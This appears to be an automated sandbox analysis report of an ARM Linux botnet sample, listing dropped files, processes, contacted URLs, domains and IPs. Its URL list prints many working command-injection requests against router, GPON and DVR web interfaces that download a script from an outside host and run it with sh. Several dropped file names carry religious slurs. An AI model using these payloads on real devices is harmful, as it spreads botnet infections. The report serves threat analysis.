Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
firmware.armv7l.elf
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/usr/bin/ioxuhzzigj
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
|
dropped
|
|
|
|
/usr/bin/urztrmjq
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
|
dropped
|
|
|
|
/var/spool/cron/crontabs/root
|
ASCII text
|
dropped
|
|
|
|
/var/spool/cron/crontabs/tmp.V6c7fF
|
ASCII text
|
dropped
|
|
|
|
/var/spool/cron/crontabs/tmp.tzvsJf
|
ASCII text
|
dropped
|
|
|
|
/etc/allah_is_prick.html
|
HTML document, ASCII text, with very long lines (360), with no line terminators
|
dropped
|
||
|
/etc/d
|
ASCII text
|
dropped
|
||
|
/home/allah_is_prick.html
|
HTML document, ASCII text, with very long lines (360), with no line terminators
|
dropped
|
||
|
/mnt/allah_is_prick.html
|
HTML document, ASCII text, with very long lines (360), with no line terminators
|
dropped
|
||
|
/root/allah_is_prick.html
|
HTML document, ASCII text, with very long lines (360), with no line terminators
|
dropped
|
||
|
/tmp/allah_is_prick.html
|
HTML document, ASCII text, with very long lines (11520), with no line terminators
|
dropped
|
||
|
/var/allah_is_prick.html
|
HTML document, ASCII text, with very long lines (360), with no line terminators
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/firmware.armv7l.elf
|
/tmp/firmware.armv7l.elf
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "crontab /var/spool/cron/crontabs/root"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/crontab
|
crontab /var/spool/cron/crontabs/root
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
sh -c "hostname -I"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/hostname
|
hostname -I
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/tmp/firmware.armv7l.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "crontab /var/spool/cron/crontabs/root"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/crontab
|
crontab /var/spool/cron/crontabs/root
|
There are 115 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://192.168.0.95/GponForm/diag_Form?images/
|
192.168.0.95
|
||
|
http://192.168.0.23/language/Swedish
|
192.168.0.23
|
||
|
http://192.168.0.124/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.124
|
||
|
http://192.168.0.192/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.192
|
||
|
http://192.168.0.16/GponForm/diag_Form?images/
|
192.168.0.16
|
||
|
http://188.114.97.3/
|
188.114.97.3
|
||
|
http://192.168.0.192/language/Swedish
|
192.168.0.192
|
||
|
http://92.53.118.39/
|
92.53.118.39
|
||
|
http://192.168.0.192/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd
|
192.168.0.192
|
||
|
http://192.168.0.97/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.97
|
||
|
http://192.168.0.18/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.18
|
||
|
http://192.168.0.173/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.173
|
||
|
http://192.168.0.56/language/Swedish
|
192.168.0.56
|
||
|
http://192.168.0.158/language/Swedish
|
192.168.0.158
|
||
|
http://194.67.71.23/
|
194.67.71.23
|
||
|
http://192.168.0.16/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.16
|
||
|
http://192.168.0.64/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.64
|
||
|
http://192.168.0.64/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd
|
192.168.0.64
|
||
|
http://192.168.0.64/language/Swedish
|
192.168.0.64
|
||
|
http://136.243.14.123/
|
136.243.14.123
|
||
|
http://192.168.0.61/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.61
|
||
|
http://31.31.196.17/
|
31.31.196.17
|
||
|
http://192.168.0.56/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.56
|
||
|
http://192.168.0.57/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.57
|
||
|
http://192.168.0.189/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.189
|
||
|
http://192.168.0.160/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd
|
192.168.0.160
|
||
|
http://62.122.170.171/
|
62.122.170.171
|
||
|
http://192.168.0.18/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.18
|
||
|
http://90.188.239.74/
|
90.188.239.74
|
||
|
http://138.68.84.37/
|
138.68.84.37
|
||
|
http://192.168.0.15/language/Swedish
|
192.168.0.15
|
||
|
http://192.168.0.97/GponForm/diag_Form?images/
|
192.168.0.97
|
||
|
http://192.168.0.97/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.97
|
||
|
http://192.168.0.23/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.23
|
||
|
http://192.168.0.64/GponForm/diag_Form?images/
|
192.168.0.64
|
||
|
http://159.69.115.63/
|
159.69.115.63
|
||
|
http://31.31.196.247/
|
31.31.196.247
|
||
|
http://192.168.0.18/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.18
|
||
|
http://192.168.0.94/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd
|
192.168.0.94
|
||
|
http://192.168.0.173/GponForm/diag_Form?images/
|
192.168.0.173
|
||
|
http://192.168.0.57/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd
|
192.168.0.57
|
||
|
http://192.168.0.192/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.192
|
||
|
http://91.189.114.22/
|
91.189.114.22
|
||
|
http://192.168.0.56/GponForm/diag_Form?images/
|
192.168.0.56
|
||
|
http://192.168.0.23/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd
|
192.168.0.23
|
||
|
http://192.168.0.18/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd
|
192.168.0.18
|
||
|
http://192.168.0.189/GponForm/diag_Form?images/
|
192.168.0.189
|
||
|
http://93.95.102.237/
|
93.95.102.237
|
||
|
http://192.168.0.57/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.57
|
||
|
http://194.67.71.191/
|
194.67.71.191
|
||
|
http://195.24.68.16/
|
195.24.68.16
|
||
|
http://192.168.0.94/language/Swedish
|
192.168.0.94
|
||
|
http://192.168.0.173/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.173
|
||
|
http://192.168.0.93/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd
|
192.168.0.93
|
||
|
http://192.168.0.15/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.15
|
||
|
http://192.168.0.173/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.173
|
||
|
http://192.168.0.189/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.189
|
||
|
http://31.31.198.199/
|
31.31.198.199
|
||
|
http://87.236.16.43/
|
87.236.16.43
|
||
|
http://192.168.0.18/GponForm/diag_Form?images/
|
192.168.0.18
|
||
|
http://192.168.0.93/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.93
|
||
|
http://78.108.80.121/
|
78.108.80.121
|
||
|
http://192.168.0.160/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd
|
192.168.0.160
|
||
|
http://192.168.0.95/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.95
|
||
|
http://192.168.0.124/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd
|
192.168.0.124
|
||
|
http://192.168.0.160/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.160
|
||
|
http://31.177.76.70/
|
31.177.76.70
|
||
|
http://192.168.0.124/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd
|
192.168.0.124
|
||
|
http://192.168.0.158/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd
|
192.168.0.158
|
||
|
http://192.168.0.124/GponForm/diag_Form?images/
|
192.168.0.124
|
||
|
http://192.168.0.16/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.16
|
||
|
http://192.168.0.93/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd
|
192.168.0.93
|
||
|
http://192.168.0.56/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.56
|
||
|
http://194.58.112.174/
|
194.58.112.174
|
||
|
http://192.168.0.61/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.61
|
||
|
http://192.168.0.97/language/Swedish
|
192.168.0.97
|
||
|
http://192.168.0.56/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.56
|
||
|
http://192.168.0.158/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.158
|
||
|
http://181.214.142.230/
|
181.214.142.230
|
||
|
http://192.168.0.18/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd
|
192.168.0.18
|
||
|
http://192.168.0.124/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.124
|
||
|
http://192.168.0.93/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.93
|
||
|
http://92.53.96.37/
|
92.53.96.37
|
||
|
http://192.168.0.64/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd
|
192.168.0.64
|
||
|
http://192.168.0.57/GponForm/diag_Form?images/
|
192.168.0.57
|
||
|
http://192.168.0.16/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.16
|
||
|
http://192.168.0.192/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd
|
192.168.0.192
|
||
|
http://192.168.0.173/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd
|
192.168.0.173
|
||
|
http://192.168.0.23/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.23
|
||
|
http://192.168.0.57/language/Swedish
|
192.168.0.57
|
||
|
http://192.168.0.23/GponForm/diag_Form?images/
|
192.168.0.23
|
||
|
http://194.67.71.166/
|
194.67.71.166
|
||
|
http://192.168.0.57/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd
|
192.168.0.57
|
||
|
http://192.168.0.97/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd
|
192.168.0.97
|
||
|
http://192.168.0.158/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan;
|
192.168.0.158
|
||
|
http://90.156.201.123/
|
90.156.201.123
|
||
|
http://192.168.0.160/GponForm/diag_Form?images/
|
192.168.0.160
|
||
|
http://31.177.80.70/
|
31.177.80.70
|
||
|
http://45.62.194.14/
|
45.62.194.14
|
||
|
http://192.168.0.16/language/Swedish
|
192.168.0.16
|
There are 90 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bdba.ru
|
31.177.80.70
|
|
|
|
aabd.ru
|
188.114.96.3
|
|
|
|
aeke.ru
|
31.177.80.70
|
|
|
|
kafl.ru
|
31.177.80.70
|
|
|
|
dcae.ru
|
31.177.76.70
|
|
|
|
cbbb.ru
|
188.114.97.3
|
|
|
|
kckc.ru
|
93.95.102.237
|
|
|
|
kece.ru
|
138.68.84.37
|
||
|
www.ccad.ru
|
62.122.170.171
|
||
|
accf.ru
|
62.122.170.171
|
||
|
fabb.ru
|
62.122.170.171
|
||
|
www.ckea.ru
|
194.120.116.196
|
||
|
www.lfbc.ru
|
159.69.115.63
|
||
|
acfe.ru
|
62.122.170.171
|
||
|
cbke.ru
|
31.31.198.217
|
||
|
fkdb.ru
|
188.114.96.3
|
||
|
www.fkdb.ru
|
188.114.97.3
|
||
|
www.ldal.ru
|
194.58.112.165
|
||
|
www.elkc.ru
|
5.23.51.100
|
||
|
www.aaak.ru
|
31.177.76.145
|
||
|
lfbc.ru
|
159.69.115.63
|
||
|
www.call.ru
|
90.156.201.54
|
||
|
www.kkkb.ru
|
5.252.116.17
|
||
|
www.kkcl.ru
|
31.31.196.17
|
||
|
ldal.ru
|
194.58.112.165
|
||
|
lffc.ru
|
159.69.115.63
|
||
|
www.akfb.ru
|
62.122.170.171
|
||
|
baad.ru
|
194.58.112.165
|
||
|
kbaa.ru
|
88.119.171.57
|
||
|
eald.ru
|
194.58.112.165
|
||
|
www.cldb.ru
|
80.251.135.126
|
||
|
www.acfe.ru
|
62.122.170.171
|
||
|
www.akda.ru
|
5.101.153.37
|
||
|
cdfc.ru
|
31.31.205.163
|
||
|
aaak.ru
|
89.111.167.3
|
||
|
adak.ru
|
77.222.56.151
|
||
|
www.kece.ru
|
138.68.84.37
|
||
|
www.lffc.ru
|
159.69.115.63
|
||
|
laka.ru
|
62.122.170.171
|
||
|
www.kbaa.ru
|
88.119.171.57
|
||
|
aecf.ru
|
31.31.205.163
|
||
|
www.aeeb.ru
|
31.31.205.163
|
||
|
ccel.ru
|
104.21.49.253
|
||
|
www.abca.ru
|
90.188.239.74
|
||
|
www.eald.ru
|
194.58.112.165
|
||
|
ckea.ru
|
45.159.211.121
|
||
|
www.aabb.ru
|
78.108.80.121
|
||
|
kkkb.ru
|
5.252.116.17
|
||
|
kdbk.ru
|
91.189.114.22
|
||
|
eala.ru
|
195.24.68.6
|
||
|
dcbl.ru
|
62.122.170.171
|
||
|
www.kkal.ru
|
5.9.102.176
|
||
|
www.ccel.ru
|
172.67.198.22
|
||
|
www.abka.ru
|
185.189.15.13
|
||
|
www.aecf.ru
|
31.31.205.163
|
||
|
aada.ru
|
31.31.196.247
|
||
|
cbak.ru
|
31.31.205.163
|
||
|
abca.ru
|
90.188.239.74
|
||
|
efab.ru
|
195.24.68.16
|
||
|
www.ceka.ru
|
62.122.170.171
|
||
|
bfba.ru
|
141.8.192.170
|
||
|
www.bfba.ru
|
141.8.192.170
|
||
|
www.klaf.ru
|
62.122.170.171
|
||
|
www.afab.ru
|
194.58.112.174
|
||
|
feba.ru
|
91.228.222.241
|
||
|
akfb.ru
|
62.122.170.171
|
||
|
www.afce.ru
|
5.101.152.161
|
||
|
acec.ru
|
31.31.196.221
|
||
|
ekac.ru
|
62.122.170.171
|
||
|
efla.ru
|
194.58.112.165
|
||
|
www.baad.ru
|
194.58.112.165
|
||
|
www.laka.ru
|
62.122.170.171
|
||
|
ddek.ru
|
92.53.96.108
|
||
|
www.kaac.ru
|
92.53.118.39
|
||
|
elkc.ru
|
5.23.51.100
|
||
|
fdak.ru
|
5.23.50.56
|
||
|
call.ru
|
90.156.201.123
|
||
|
daisy.ubuntu.com
|
162.213.35.25
|
||
|
labb.ru
|
195.24.68.13
|
||
|
faak.ru
|
31.31.198.199
|
||
|
www.akkb.ru
|
31.177.76.145
|
||
|
www.kdfc.ru
|
159.69.115.63
|
||
|
aaka.ru
|
136.243.14.123
|
||
|
eaaa.ru
|
31.177.76.145
|
||
|
beca.ru
|
31.31.205.163
|
||
|
www.aaal.ru
|
87.236.16.43
|
||
|
www.clbc.ru
|
188.114.96.3
|
||
|
fafa.ru
|
62.122.170.171
|
||
|
eaek.ru
|
91.226.82.185
|
||
|
beke.ru
|
31.31.205.163
|
||
|
www.abkc.ru
|
62.122.170.171
|
||
|
aedd.ru
|
62.122.170.171
|
||
|
www.alad.ru
|
92.53.96.37
|
||
|
www.aakk.ru
|
194.67.71.40
|
||
|
alal.ru
|
212.5.69.131
|
||
|
www.aedd.ru
|
62.122.170.171
|
||
|
www.alal.ru
|
212.5.69.131
|
||
|
www.leec.ru
|
62.122.170.171
|
||
|
aaal.ru
|
87.236.16.43
|
||
|
leec.ru
|
62.122.170.171
|
There are 90 hidden domains, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.182.253.122
|
unknown
|
United States
|
||
|
4.84.3.215
|
unknown
|
United States
|
||
|
110.32.55.173
|
unknown
|
Australia
|
||
|
198.170.61.131
|
unknown
|
United States
|
||
|
220.185.96.124
|
unknown
|
China
|
||
|
102.196.169.4
|
unknown
|
unknown
|
||
|
98.160.133.13
|
unknown
|
United States
|
||
|
190.190.170.63
|
unknown
|
Argentina
|
||
|
13.193.26.67
|
unknown
|
United States
|
||
|
184.217.22.60
|
unknown
|
United States
|
||
|
71.23.239.219
|
unknown
|
United States
|
||
|
170.96.9.125
|
unknown
|
United States
|
||
|
206.109.204.1
|
unknown
|
United States
|
||
|
186.66.250.97
|
unknown
|
Ecuador
|
||
|
83.211.77.203
|
unknown
|
Italy
|
||
|
53.88.248.35
|
unknown
|
Germany
|
||
|
123.38.164.75
|
unknown
|
Korea Republic of
|
||
|
63.254.35.251
|
unknown
|
United States
|
||
|
88.163.61.116
|
unknown
|
France
|
||
|
107.211.16.61
|
unknown
|
United States
|
||
|
104.43.221.50
|
unknown
|
United States
|
||
|
163.57.235.177
|
unknown
|
unknown
|
||
|
163.121.35.242
|
unknown
|
Egypt
|
||
|
48.92.6.192
|
unknown
|
United States
|
||
|
41.0.157.201
|
unknown
|
South Africa
|
||
|
144.192.116.111
|
unknown
|
United States
|
||
|
118.226.178.111
|
unknown
|
China
|
||
|
138.99.35.184
|
unknown
|
Brazil
|
||
|
19.92.72.14
|
unknown
|
United States
|
||
|
19.101.93.181
|
unknown
|
United States
|
||
|
116.171.108.213
|
unknown
|
China
|
||
|
154.155.6.60
|
unknown
|
Kenya
|
||
|
88.135.73.153
|
unknown
|
Denmark
|
||
|
63.28.127.6
|
unknown
|
United States
|
||
|
216.243.127.122
|
unknown
|
United States
|
||
|
113.183.33.155
|
unknown
|
Viet Nam
|
||
|
185.211.251.106
|
unknown
|
Netherlands
|
||
|
141.239.165.193
|
unknown
|
United States
|
||
|
158.252.245.78
|
unknown
|
United States
|
||
|
194.68.36.237
|
unknown
|
Sweden
|
||
|
40.34.194.245
|
unknown
|
United States
|
||
|
73.194.71.122
|
unknown
|
United States
|
||
|
186.236.171.169
|
unknown
|
Brazil
|
||
|
182.186.16.71
|
unknown
|
Pakistan
|
||
|
120.58.80.105
|
unknown
|
India
|
||
|
113.36.26.172
|
unknown
|
Japan
|
||
|
218.1.78.47
|
unknown
|
China
|
||
|
186.210.247.25
|
unknown
|
Brazil
|
||
|
69.174.72.229
|
unknown
|
United States
|
||
|
73.239.56.207
|
unknown
|
United States
|
||
|
149.59.121.236
|
unknown
|
Netherlands
|
||
|
50.111.61.43
|
unknown
|
United States
|
||
|
167.123.245.209
|
unknown
|
Australia
|
||
|
24.222.92.77
|
unknown
|
Canada
|
||
|
71.236.205.153
|
unknown
|
United States
|
||
|
59.128.176.228
|
unknown
|
Japan
|
||
|
169.152.70.49
|
unknown
|
United States
|
||
|
80.127.228.2
|
unknown
|
Netherlands
|
||
|
111.109.74.178
|
unknown
|
Japan
|
||
|
138.249.57.174
|
unknown
|
Finland
|
||
|
110.84.93.230
|
unknown
|
China
|
||
|
143.39.105.108
|
unknown
|
United States
|
||
|
145.248.9.87
|
unknown
|
France
|
||
|
186.16.121.170
|
unknown
|
Paraguay
|
||
|
128.188.149.183
|
unknown
|
United States
|
||
|
63.211.32.246
|
unknown
|
United States
|
||
|
179.194.82.255
|
unknown
|
Brazil
|
||
|
57.37.60.64
|
unknown
|
Belgium
|
||
|
173.91.160.25
|
unknown
|
United States
|
||
|
17.41.169.73
|
unknown
|
United States
|
||
|
31.88.95.108
|
unknown
|
United Kingdom
|
||
|
90.247.1.134
|
unknown
|
United Kingdom
|
||
|
20.136.68.40
|
unknown
|
United States
|
||
|
18.1.17.137
|
unknown
|
United States
|
||
|
130.130.60.150
|
unknown
|
Australia
|
||
|
53.122.19.214
|
unknown
|
Germany
|
||
|
221.235.119.126
|
unknown
|
China
|
||
|
220.56.85.44
|
unknown
|
Japan
|
||
|
